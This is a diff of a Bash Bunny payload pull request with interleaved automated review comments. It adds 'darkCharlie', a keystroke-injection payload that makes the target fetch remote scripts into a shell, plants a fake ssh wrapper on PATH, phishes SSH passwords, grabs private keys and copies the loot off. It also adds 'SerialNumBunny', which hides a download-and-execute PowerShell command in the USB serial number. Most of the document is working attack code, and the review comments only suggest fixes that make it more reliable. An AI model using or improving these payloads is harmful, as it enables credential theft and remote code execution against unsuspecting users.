QUACK STRING "python -c \"import os; home = os.environ['HOME']; file = open(home + '/.bash_profile','r'); dataIn = file.readlines(); file.close(); dataOut = [line for line in dataIn if not '~/.config/ssh' in line]; output = ''.join(dataOut); file = open(home + '/.bash_profile','w'); file.write(output); file.close()\""
|
||||
else
|
||||
QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
|
||||
fi
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK DELAY 2000
|
||||
QUACK GUI w
|
||||
else
|
||||
QUACK STRING exit
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
fi
|
||||
LED SUCCESS
|
||||
#See you, space cowboy...
|
|
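Review bot: in the `QUACK STRING scp ... root@$HOST_IP:$LOOT/\$USER.$HOSTNAME.ssh.passwd.json` line, `\$USER` is escaped so it expands on the target, but `$HOSTNAME` is not, so it expands in the Bunny's own bash and every target's loot file is named after the Bunny's hostname; escape it as `\$HOSTNAME` to match `\$USER`, otherwise loot from different machines with the same username overwrites itself. Two smaller points: the password `hak5bunny` is typed unconditionally 500 ms after Enter, so if the scp prompt is slower than that the password lands in the target's shell (and its history) and the copy fails, and the header legend says "Green | Finished" while the script ends with `LED SUCCESS`; the README in this merge lists `FINISH` as the end state and does not name `SUCCESS`, so confirm the alias exists or use `LED FINISH` (and `LED CLEANUP` around the `rm -rf \~/.config/ssh` block, which is a cleanup phase).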
@ -0,0 +1,415 @@
|
|||
#! PYTHON_EXECUTABLE_GOES_HERE
|
||||
|
||||
'''
|
||||
Dark Charlie remote shell cred grabber
|
||||
|
||||
Version 0.1
|
||||
|
||||
Using open-ended exceptions here to maintain silence when errors happen
|
||||
'''
|
||||
|
||||
originalSSHExecutable = "ORIGINAL_SSH_EXE_GOES_HERE"
|
||||
|
||||
def cantLoadModuleError():
|
||||
import sys
|
||||
if sys.version_info.major < 3:
|
||||
return ImportError
|
||||
if sys.version_info.minor < 6:
|
||||
return ImportError
|
||||
else:
|
||||
return ModuleNotFoundError
|
||||
|
||||
def getLootFileName():
|
||||
import os
|
||||
thisFullPath = os.path.abspath(__file__)
|
||||
thisDirectory = os.path.split(thisFullPath)[0]
|
||||
lootFile = thisDirectory + os.sep + "ssh.conf"
|
||||
return os.path.join(lootFile)
|
||||
|
||||
def initializeThisScript():
|
||||
'''This function will be run the first time by the bunny'''
|
||||
import subprocess
|
||||
import re
|
||||
pathFinder = subprocess.Popen("which python".split(), stdout = subprocess.PIPE)
|
||||
pythonExecutable = pathFinder.stdout.read().strip()
|
||||
pathFinder = subprocess.Popen("which ssh".split(), stdout = subprocess.PIPE)
|
||||
sshExecutable = pathFinder.stdout.read().strip()
|
||||
try:
|
||||
import paramiko
|
||||
except cantLoadModuleError():
|
||||
try:
|
||||
paramikoInstaller = subprocess.Popen("pip install --user paramiko".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
paramikoInstaller = subprocess.Popen("pip3 install --user paramiko".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
except:
|
||||
pass
|
||||
try:
|
||||
import json
|
||||
except cantLoadModuleError():
|
||||
try:
|
||||
jsonInstaller = subprocess.Popen("pip install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
jsonInstaller = subprocess.Popen("pip3 install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
except:
|
||||
pass
|
||||
try:
|
||||
import getpass
|
||||
except:
|
||||
try:
|
||||
getPassInstaller = subprocess.Popen("pip install --user getpass", stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
except:
|
||||
pass
|
||||
thisFileName = __file__
|
||||
thisFile = open(thisFileName, 'r')
|
||||
originalCode = thisFile.read()
|
||||
thisFile.close()
|
||||
newCode = re.sub("PYTHON_EXECUTABLE_GOES_HERE", pythonExecutable, originalCode, 1)
|
||||
newCode = re.sub("ORIGINAL_SSH_EXE_GOES_HERE", sshExecutable, newCode, 1)
|
||||
thisFile = open(thisFileName, 'w')
|
||||
thisFile.write(newCode)
|
||||
thisFile.close()
|
||||
createLootFile(getLootFileName())
|
||||
quit()
|
||||
|
||||
def createLootFile(lootFileName):
|
||||
import json
|
||||
initialData = {"configFiles":{}, "passwords":{}}
|
||||
addDefaultSSHConfigFilesToLoot(initialData)
|
||||
lootFile = open(lootFileName, 'w')
|
||||
json.dump(initialData, lootFile)
|
||||
lootFile.close()
|
||||
|
||||
def addDefaultSSHConfigFilesToLoot(lootData): #using lootData as a reference here, no returns
|
||||
mainConfigData, userConfigData = analyzeDefaultSSHConfigFiles()
|
||||
mainConfigHash, mainData = mainConfigData
|
||||
userConfigHash, userData = userConfigData
|
||||
lootData["configFiles"][mainConfigHash] = mainData
|
||||
lootData["configFiles"]["main"] = mainData
|
||||
lootData["configFiles"][userConfigHash] = userData
|
||||
lootData["configFiles"]["user"] = userData
|
||||
|
||||
def analyzeDefaultSSHConfigFiles():
|
||||
import os
|
||||
try:
|
||||
mainConfigData = analyzeConfigFile("/etc/ssh/ssh_config")
|
||||
if mainConfigData:
|
||||
mainFileHash, mainData = mainConfigData
|
||||
else:
|
||||
mainFileHash = None
|
||||
mainData = None
|
||||
except:
|
||||
mainFileHash = None
|
||||
mainData = None
|
||||
try:
|
||||
userConfigFileName = os.getenv("HOME") + "/.ssh/config"
|
||||
userConfigData = analyzeConfigFile(userConfigFileName)
|
||||
if userConfigData:
|
||||
userFileHash, userData = userConfigData
|
||||
else:
|
||||
userFileHash = None
|
||||
userData = None
|
||||
except:
|
||||
userFileHash = None
|
||||
userData = None
|
||||
return ((mainFileHash, mainData), (userFileHash, userData))
|
||||
|
||||
def loadLootFile(lootFileName):
|
||||
import json
|
||||
try:
|
||||
file = open(lootFileName, 'r')
|
||||
data = json.load(file)
|
||||
file.close()
|
||||
return data
|
||||
except:
|
||||
return False
|
||||
|
||||
def saveLootFile(loot, lootFileName):
|
||||
import json
|
||||
try:
|
||||
file = open(lootFileName, 'w')
|
||||
json.dump(loot, file)
|
||||
file.close()
|
||||
except:
|
||||
pass
|
||||
|
||||
class SSHArgHandler(object):
|
||||
|
||||
def __init__(self, rawArgList):
|
||||
self.password = None
|
||||
self.optionsDict = self.getOptionsDict(rawArgList)
|
||||
self.keyFileName = self.findArgument("-i", rawArgList)
|
||||
if self.keyFileName:
|
||||
self.keyFile = snarfKeyFile(self.keyFileName)
|
||||
else:
|
||||
self.keyFile = None
|
||||
self.configFile = self.findArgument("-F", rawArgList)
|
||||
if self.configFile:
|
||||
configFileInfo = analyzeConfigFile(self.configFile)
|
||||
else:
|
||||
configFileInfo = None
|
||||
if configFileInfo:
|
||||
self.configFileHash, self.configFileDict = configFileInfo
|
||||
else:
|
||||
self.configFileHash = None
|
||||
self.configFileDict = None
|
||||
self.host = rawArgList[-1]
|
||||
if "@" in self.host:
|
||||
self.host = self.host.split("@")[-1]
|
||||
self.port = self.findArgument("-p", rawArgList)
|
||||
self.user = self.findUserName(rawArgList)
|
||||
self.commandOptions = " ".join(rawArgList[1:])
|
||||
self.intendedCommand = originalSSHExecutable + " " + self.commandOptions
|
||||
|
||||
def findUserName(self, args):
|
||||
user = self.findArgument("-l", args)
|
||||
if not user:
|
||||
if "@" in args[-1]:
|
||||
user = args[-1].split("@")[0]
|
||||
if not user:
|
||||
if "User" in self.optionsDict:
|
||||
user = self.optionsDict["User"]
|
||||
if not user:
|
||||
if self.configFileDict and self.host in self.configFileDict:
|
||||
if "User" in self.configFileDict[self.host]:
|
||||
user = self.configFileDict[self.host]["User"]
|
||||
if not user:
|
||||
return "None"
|
||||
return user
|
||||
|
||||
def getOptionsDict(self, args):
|
||||
interestingArgs = args[1:-1]
|
||||
options = {}
|
||||
for i in range(len(interestingArgs)):
|
||||
rawOption = None
|
||||
if interestingArgs[i].startswith("-o"):
|
||||
if len(interestingArgs[i]) > 2:
|
||||
rawOption = interestingArgs[i][2:]
|
||||
elif i == len(interestingArgs) - 1: #somebody probably messed up the command
|
||||
continue
|
||||
else:
|
||||
rawOption = interestingArgs[i + 1]
|
||||
if rawOption:
|
||||
optionList = rawOption.split("=")
|
||||
if len(optionList) == 2:
|
||||
key, value = optionList
|
||||
options[key] = value
|
||||
return options
|
||||
|
||||
def findArgument(self, argOfInterest, args): #this assumes the argument of interest should only show up in the command once
|
||||
interestingArgs = args[1:-1]
|
||||
for i in range(len(interestingArgs)):
|
||||
if interestingArgs[i].startswith(argOfInterest):
|
||||
if len(interestingArgs[i]) > 2 and not argOfInterest.startswith("--"):
|
||||
value = interestingArgs[i][2:]
|
||||
elif i == len(interestingArgs) - 1: #ten bucks says this probably won't run
|
||||
continue
|
||||
else:
|
||||
return interestingArgs[i + 1]
|
||||
return None
|
||||
|
||||
def saveData(self):
|
||||
infoDict = {}
|
||||
if self.password:
|
||||
infoDict["password"] = self.password
|
||||
if self.optionsDict:
|
||||
infoDict["options"] = self.optionsDict
|
||||
if self.keyFile:
|
||||
infoDict["privateKey"] = self.keyFile
|
||||
if self.host:
|
||||
infoDict["host"] = self.host
|
||||
if self.port:
|
||||
infoDict["port"] = self.port
|
||||
if self.user:
|
||||
infoDict["user"] = self.user
|
||||
return infoDict
|
||||
|
||||
def analyzeConfigFile(configFileName): #The tat rolled a 20?
|
||||
import os
|
||||
import re
|
||||
regexSplitter = re.compile("[\s\=]")
|
||||
if not os.path.isfile(configFileName):
|
||||
return False
|
||||
file = open(configFileName, 'r')
|
||||
data = file.read()
|
||||
file.close()
|
||||
fileHash = hash(data)
|
||||
data = data.split("\n")
|
||||
currentHostNickname = "None"
|
||||
hostDict = {}
|
||||
for line in data:
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
if line.startswith("#"):
|
||||
continue
|
||||
if line.startswith("Host") and line.split()[0] == "Host":
|
||||
hostLine = re.split(regexSplitter, line)
|
||||
if len(hostLine) > 1:
|
||||
currentHostNickname = hostLine[1]
|
||||
else:
|
||||
currentHostNickname = "None"
|
||||
if not currentHostNickname in hostDict:
|
||||
hostDict[currentHostNickname] = {}
|
||||
continue
|
||||
lineSplit = re.split(regexSplitter, line)
|
||||
if len(lineSplit) == 1:
|
||||
hostDict[currentHostNickname][lineSplit[0]] = "None"
|
||||
else:
|
||||
key = lineSplit[0]
|
||||
value = " ".join(lineSplit[1:])
|
||||
try:
|
||||
if key == "IdentityFile":
|
||||
keyRead = snarfKeyFile(value)
|
||||
if not keyRead:
|
||||
value += "(FILENOTFOUND)"
|
||||
else:
|
||||
value = keyRead
|
||||
except:
|
||||
value = "UnableToLoad"
|
||||
hostDict[currentHostNickname][key] = value
|
||||
return (fileHash, hostDict)
|
||||
|
||||
def snarfKeyFile(keyFileName):
|
||||
import os
|
||||
import base64
|
||||
if not os.path.isfile(keyFileName):
|
||||
return False
|
||||
keyFile = open(keyFileName, 'rb')
|
||||
key = keyFile.read()
|
||||
keyFile.close()
|
||||
return base64.b64encode(key).decode()
|
||||
|
||||
def paramikoSaysWeNeedAPassword(host, port, user):
|
||||
try:
|
||||
import paramiko
|
||||
except cantLoadModuleError():
|
||||
return True #default to true if we can't check it
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
|
||||
try:
|
||||
ssh.connect(host, port = int(port), username = user)
|
||||
ssh.close()
|
||||
return False
|
||||
except paramiko.ssh_exception.SSHException:
|
||||
try:
|
||||
ssh.connect(host, port = int(port), username = user, password = "12345") #probably not their real password unless they're an idiot and this is their luggage
|
||||
ssh.close()
|
||||
return False
|
||||
except paramiko.ssh_exception.AuthenticationException:
|
||||
return True
|
||||
except:
|
||||
return False
|
||||
|
||||
def paramikoApprovesOfThisPassword(host, port, user, password):
|
||||
try:
|
||||
import paramiko
|
||||
except cantLoadModuleError():
|
||||
return True #default to true if we can't check it
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
|
||||
try:
|
||||
ssh.connect(host, port = int(port), username = user, password = password) #hopefully their real password
|
||||
ssh.close()
|
||||
return True
|
||||
except paramiko.ssh_exception.AuthenticationException:
|
||||
return False
|
||||
|
||||
def parseArguments():
|
||||
import sys
|
||||
argList = sys.argv
|
||||
if "--initializeScript" in sys.argv:
|
||||
initializeThisScript()
|
||||
else:
|
||||
return argList
|
||||
|
||||
def findHostInLootConfigs(lootFileData, host):
|
||||
for fileHash in lootFileData["configFiles"]:
|
||||
if lootFileData["configFiles"][fileHash] and host in lootFileData["configFiles"][fileHash]: #have to check if there is even file data there, otherwise we end up indexing into nothing and failing hard
|
||||
return lootFileData["configFiles"][fileHash][host]
|
||||
return None
|
||||
|
||||
def getUserName():
|
||||
import getpass
|
||||
return getpass.getuser()
|
||||
|
||||
def lowDownDirtyDeceiver(user, hostAddress):
|
||||
import getpass
|
||||
prompt = "%s@%s's password: " %(user, hostAddress)
|
||||
password = getpass.getpass(prompt)
|
||||
print("Permission denied, please try again.")
|
||||
return password
|
||||
|
||||
def shinyLetsBeBadGuys():
|
||||
argList = parseArguments()
|
||||
lootFileData = loadLootFile(getLootFileName())
|
||||
sshArgs = SSHArgHandler(argList)
|
||||
if sshArgs.configFileHash:
|
||||
lootFileData["configFiles"][sshArgs.configFileHash] = sshArgs.configFileDict
|
||||
addDefaultSSHConfigFilesToLoot(lootFileData)
|
||||
hostConfigFileData = findHostInLootConfigs(lootFileData, sshArgs.host)
|
||||
hostAddress = sshArgs.host
|
||||
userName = None
|
||||
hostPort = None
|
||||
password = None
|
||||
if lootFileData["configFiles"]["main"]:
|
||||
if "HostName" in lootFileData["configFiles"]["main"]:
|
||||
hostAddress = lootFileData["configFiles"]["main"]["HostName"]
|
||||
if "Port" in lootFileData["configFiles"]["main"]:
|
||||
hostPort = lootFileData["configFiles"]["main"]["Port"]
|
||||
if "IdentityFile" in lootFileData["configFiles"]["main"]:
|
||||
password = "file(%s)" %lootFileData["configFiles"]["main"]["IdentityFile"]
|
||||
if lootFileData["configFiles"]["user"]:
|
||||
if "HostName" in lootFileData["configFiles"]["user"]:
|
||||
hostAddress = lootFileData["configFiles"]["user"]["HostName"]
|
||||
if "Port" in lootFileData["configFiles"]["user"]:
|
||||
hostPort = lootFileData["configFiles"]["user"]["Port"]
|
||||
if "IdentityFile" in lootFileData["configFiles"]["user"]:
|
||||
password = "file(%s)" %lootFileData["configFiles"]["user"]["IdentityFile"]
|
||||
if hostConfigFileData:
|
||||
if "HostName" in hostConfigFileData:
|
||||
hostAddress = hostConfigFileData["HostName"]
|
||||
if "Port" in hostConfigFileData:
|
||||
hostPort = hostConfigFileData["Port"]
|
||||
if "IdentityFile" in hostConfigFileData:
|
||||
password = "file(%s)" %hostConfigFileData["IdentityFile"]
|
||||
if sshArgs.user:
|
||||
userName = sshArgs.user
|
||||
if sshArgs.port:
|
||||
hostPort = sshArgs.port
|
||||
if sshArgs.keyFile:
|
||||
password = "file(%s)" %sshArgs.keyFile
|
||||
if not userName:
|
||||
try:
|
||||
userName = getUserName()
|
||||
except:
|
||||
userName = "DefaultUserName"
|
||||
if not hostPort:
|
||||
hostPort = "22"
|
||||
hostInfo = "%s@%s:%s" %(userName, hostAddress, hostPort) # user@hostAddress:port
|
||||
if not password:
|
||||
if not hostInfo in lootFileData["passwords"]:
|
||||
gotValidPass = False
|
||||
while not gotValidPass:
|
||||
try:
|
||||
password = lowDownDirtyDeceiver(userName, hostAddress)
|
||||
except:
|
||||
password = "FailedToObtain"
|
||||
break
|
||||
try:
|
||||
gotValidPass = paramikoApprovesOfThisPassword(hostAddress, hostPort, userName, password)
|
||||
except:
|
||||
break
|
||||
lootFileData["passwords"][hostInfo] = [password, sshArgs.intendedCommand, sshArgs.saveData()] #json doesn't do tuples anyway
|
||||
saveLootFile(lootFileData, getLootFileName())
|
||||
|
||||
if __name__ == '__main__':
|
||||
import os
|
||||
args = parseArguments()
|
||||
intendedCommand = args[:]
|
||||
intendedCommand[0] = originalSSHExecutable
|
||||
intendedCommand = " ".join(intendedCommand)
|
||||
try:
|
||||
if len(args) > 1:
|
||||
shinyLetsBeBadGuys()
|
||||
except: #I really feel weird doing a massive open-ended exception here... but silence
|
||||
pass
|
||||
os.system(intendedCommand)
|
||||
quit()
|
|
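Review bot: the `pip install --user json` / `pip3 install --user json` and `pip install --user getpass` fallbacks in the import block are dead code: `json` and `getpass` are standard-library modules and are not on PyPI under those names, the `except cantLoadModuleError():` clauses name something that is defined nowhere in this file, and the `getpass` installer passes an unsplit string to `Popen` unlike the two above it; drop the three fallback blocks and keep the plain imports. The bare `except:` clauses (the one under `if __name__ == '__main__':` with the `#I really feel weird...` comment, plus those in `loadLootFile`, `saveLootFile` and `analyzeDefaultSSHConfigFiles`) also swallow `SystemExit` and `KeyboardInterrupt`; catch `Exception` at most, and log rather than `pass` where the README promises behaviour. The JSON written by `createLootFile` / `saveLootFile` holds plaintext passwords and the base64 of whole private-key files from `snarfKeyFile`; the README should state where `getLootFileName()` puts that file and what it contains.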
@ -0,0 +1,101 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Title: darkCharlie
|
||||
# Author: Michael Weinstein
|
||||
# Target: Mac/Linux
|
||||
# Version: 0.1
|
||||
#
|
||||
# Create a wrapper for ssh sessions that
|
||||
# will live inside ~/.config/ssh and be added
|
||||
# tn the $PATH.
|
||||
#
|
||||
# This payload was inspired greatly by SudoBackdoor
|
||||
# and much of the code here was derived (or copied
|
||||
# wholesale) from that with great thanks to oXis.
|
||||
#
|
||||
# White | Ready
|
||||
# Amber blinking | Waiting for server
|
||||
# Blue blinking | Attacking
|
||||
# Green | Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
#setup the attack on macos (if false, attack is for Linux)
|
||||
mac=false
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
else
|
||||
ATTACKMODE ECM_ETHERNET HID
|
||||
fi
|
||||
|
||||
DUCKY_LANG us
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening (credit audibleblink)
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
# that was brilliant!
|
||||
|
||||
LED ATTACK
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
RUN OSX terminal
|
||||
else
|
||||
RUN UNITY xterm
|
||||
fi
|
||||
QUACK DELAY 2000
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
QUACK STRING python "~/.config/ssh/ssh" --initializeScript
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
else
|
||||
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh" #Will test this on a mac when I finish up
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK STRING python "~/.config/ssh/ssh" --initializeScript
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
fi
|
||||
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK DELAY 5000 #seems like macs need some extra time on this
|
||||
QUACK GUI w
|
||||
else
|
||||
QUACK STRING exit
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
fi
|
||||
LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20
|
|
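Review bot: the `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule and the backgrounded `python -m SimpleHTTPServer 80 &` are never torn down before `LED SUCCESS`, so both persist on the Bunny until it is rebooted; remove the rule with the matching `iptables -D` and stop the server with `kill %1` at the end, as the cleanup stage of other payloads in this repository does. Minor: the header comment reads `tn the $PATH` (typo for `to`), and the Linux branch sends `QUACK DELAY 200` before `QUACK ENTER` while the mac branch sends `QUACK ENTER` first; pick one ordering so the two branches are easy to compare.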
@ -0,0 +1,10 @@
|
|||
#!/bin/bash
|
||||
|
||||
chmod u+x ~/.config/ssh/ssh
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
|
||||
else
|
||||
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
|
||||
fi
|
||||
|
|
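Review bot: this file has no header comment, unlike `payload.txt` and the other files in the PR; add one saying that it runs on the target (it is fetched and piped to `sh` from payload.txt), that it appends one line to `~/.bash_profile` or `~/.bashrc`, and what that line is, because the README's Cleaner section promises to revert exactly that change. Note also that `"export PATH=~/.config/ssh:$PATH"` is double-quoted, so `$PATH` is expanded by the shell that runs this script and the expanded value is written into the profile verbatim; the README should mention that, since it is what anyone reading the profile afterwards will see.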
@ -0,0 +1,11 @@
|
|||
#!/bin/bash
|
||||
|
||||
if [ ! -d ~/.config/ssh ]
|
||||
then
|
||||
mkdir -p ~/.config/ssh
|
||||
fi
|
||||
|
||||
if [ -f ~/.config/ssh/ssh ]
|
||||
then
|
||||
rm ~/.config/ssh/ssh
|
||||
fi
|
|
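Review bot: the `if [ ! -d ~/.config/ssh ]` guard around `mkdir -p ~/.config/ssh` is redundant, since `mkdir -p` already succeeds on an existing directory; likewise `rm -f ~/.config/ssh/ssh` does what the `if [ -f ... ]` block does in one line. Same missing header comment as `post.sh`: say what this script is for and where it runs.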
@ -0,0 +1,36 @@
|
|||
# darkCharlie SSH credential grabber
|
||||
|
||||
* Author: Michael Weinstein
|
||||
* Version: 0.1
|
||||
* Target: Mac/Linux
|
||||
|
||||
Mad credit to oXis for their attack approach. Much of the code here was developed using SudoBackdoor as a reference.
|
||||
|
||||
Current dev status: I have tested this with both private key and password auth on a linux machine and found it working. I have not extensively tested with config files, but the limited testing I have done suggests that it is working as intended. I have not tested yet on a mac, but will probably do so very soon. I still need to do some more polishing on this, and especially want to get the use of paramiko better where it can check if the login needs a password and then check if the password entered into the wrapper is valid.
|
||||
|
||||
## Description
|
||||
|
||||
Injector: Creates a folder called ~/.config/ssh where it puts a python wrapper for ssh. Next, it copies over the python SSH wrapper. It then runs the initialization function in the wrapper script to set some environmental values like the actual path for SSH and the path for python. The initialization function also initializes a file for saving SSH creds and configuration details in JSON format. It will save the global and user SSH config file details immediately, including grabbing any private keys linked in the config file (if you know these will be of interest, you can exfiltrate them immediately). Finally, ~/.config/ssh is added as the first element on the user's PATH so that they will be running this wrapper instead of actually SSHing in. The main abnormality a user will see is if they need to manually enter a password, they'll get it "wrong" the first time and have to reenter it. This wrapper will load previous loot to see if a server's password has already been gotten and won't try to get it again to avoid raising suspicions.
|
||||
Cleaner: Gets back the file containing JSON-encoded SSH configuration and credential data. After exfiltration of the data, it will delete the directory and files it created and clean up its change to the bashrc or bash_profile.
|
||||
|
||||
## Configuration
|
||||
|
||||
Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode.
|
||||
|
||||
## STATUS (Note that I used the same configuration as SudoBackdoor, but I am seeing different LED behaviors. Will investigate this soon.)
|
||||
Injector
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | -------------------- |
|
||||
| White | Ready |
|
||||
| Amber blinking | Waiting for server |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
||||
|
||||
Cleaner
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | -------------------- |
|
||||
| White | Ready |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
|
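Review bot: `playload` in the Configuration section is a typo for `payload`, and the STATUS heading embeds a parenthetical dev note about unexplained LED behaviour; move that note into the `Current dev status` paragraph. That paragraph says the payload has not been tested on a mac, yet the Configuration section offers `mac=true` without qualification; mark the macOS mode as untested there too. The Description should also state where the JSON loot file is written and that it holds plaintext passwords and base64-encoded private keys, since the Cleaner section assumes the reader already knows which file is being retrieved.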
@ -0,0 +1,15 @@
|
|||
#This is just an example script, you may want to replace it with a script of your choice
|
||||
$Picture=@"
|
||||
|
||||
_____ _____ _____ _____ _____ _____ _____ _____ __ __
|
||||
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
|
||||
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
|
||||
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
|
||||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
"@
|
||||
|
||||
Sleep -s 5
|
||||
Write-Host -ForegroundColor red "$Picture"
|
||||
Sleep -s 2
|
||||
Write-Host -ForegroundColor green "SerialNumBunny by 0i41E"
|
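Review bot: `Sleep -s 5` and `Sleep -s 2` use the `Sleep` alias with an abbreviated parameter; write them as `Start-Sleep -Seconds 5` and `Start-Sleep -Seconds 2` so the intent is obvious and the script still runs where aliases are unavailable. `Write-Host -ForegroundColor red "$Picture"` can pass `$Picture` unquoted, since it is already a string. The first-line comment says this is an example script; the README should say the same so nobody treats it as the payload itself.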
Binary file not shown.
After Width: | Height: | Size: 31 KiB |
|
@ -0,0 +1,46 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SerialNumBunny
|
||||
# Description: Execute strings placed in the Bunny serial number
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
||||
# Starting as Ethernet device only first to get IP
|
||||
LED SETUP
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
# Switch to Ethernet & HID
|
||||
LED Y
|
||||
# Defining Device Identifiers - Serialnumber contains payload
|
||||
ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
# disallow outgoing dns requests so the server is accessible immediately
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
|
||||
#Opens hidden powershell instance
|
||||
Q DELAY 1500
|
||||
Q GUI r
|
||||
Q DELAY 500
|
||||
Q STRING "powershell"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
|
||||
Q DELAY 1000
|
||||
# Make sure that device ID matches what was defined above
|
||||
Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex"
|
||||
Q DELAY 400
|
||||
Q ENTER
|
||||
LED FINISH
|
|
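Review bot: the comment `#Opens hidden powershell instance` above `Q GUI r` is inaccurate: `GUI r`, `powershell`, ENTER opens a normal, visible PowerShell window and nothing in the payload hides it; correct the comment to match the behaviour. As in the other HTTP-server payloads, the `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule and the backgrounded `SimpleHTTPServer` are never removed before `LED FINISH`. The long `Q STRING` with `Get-PnpDevice` is a single 200-plus-character command; a comment naming its stages (filter USB devices by the `F000` VID, take the last `DeviceID` segment, turn underscores back into spaces) would help whoever maintains it, and the README's remark about the serial-number character limit should be repeated next to the `ATTACKMODE ... SN_...` line where the limit actually bites.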
@ -0,0 +1,19 @@
|
|||
**Title: SerialNumBunny**
|
||||
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
**What is SerialNumBunny?**
|
||||
|
||||
*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.*
|
||||
|
||||
You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts.
|
||||
|
||||
**Instruction:**
|
||||
|
||||
- Upload your script or the example provided onto your Bunnys switch folder.
|
||||
- Plug in the Bunny and let the magic happen.
|
||||
![SerialNumBunny](https://github.com/0i41E/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226)
|
||||
|
||||
_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._
|
|
